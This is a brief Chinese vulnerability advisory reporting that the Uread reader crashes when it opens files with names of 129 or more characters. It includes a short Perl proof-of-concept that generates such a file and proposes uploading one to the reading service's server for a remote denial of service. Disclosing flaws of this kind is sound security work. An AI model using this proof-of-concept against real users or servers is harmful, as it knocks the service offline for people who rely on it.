| Uread閱讀器在遠(yuǎn)程或本地打開(kāi)文件名過(guò)長(zhǎng)(大于或等于129個(gè)字符)的upub等文件時(shí)將引起uread.exe程序無(wú)法正常工作,必須重新啟動(dòng)uread.exe進(jìn)程方可。 遠(yuǎn)程攻擊者可考慮將過(guò)長(zhǎng)文件名的文件上傳至“至善讀書(shū)”的服務(wù)器端,實(shí)現(xiàn)遠(yuǎn)程拒絕服務(wù)攻擊。 測(cè)試證明 ----------------------------------------------------------- #!/usr/bin/perl -w $filename="a"x129; print "------Generate testfile \"a\"x129.epub------\n"; open(TESTFILE, ">$filename.epub"); sleep(3); close(TESTFILE); print "------Complete!------\n"; exit(1); ----------------------------------------------------------- 修復(fù)方案: 目前廠商還沒(méi)有提供補(bǔ)丁或者升級(jí)程序。 作者 demonalex |
免責(zé)聲明:本站部分文章和圖片均來(lái)自用戶(hù)投稿和網(wǎng)絡(luò)收集,旨在傳播知識(shí),文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請(qǐng)勿用于商業(yè)用途,如果損害了您的權(quán)利,請(qǐng)聯(lián)系我們及時(shí)修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長(zhǎng)、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長(zhǎng)轉(zhuǎn)型升級(jí),為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營(yíng)銷(xiāo)服務(wù),與站長(zhǎng)一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!
掃一掃,關(guān)注站長(zhǎng)網(wǎng)微信
大家都在看
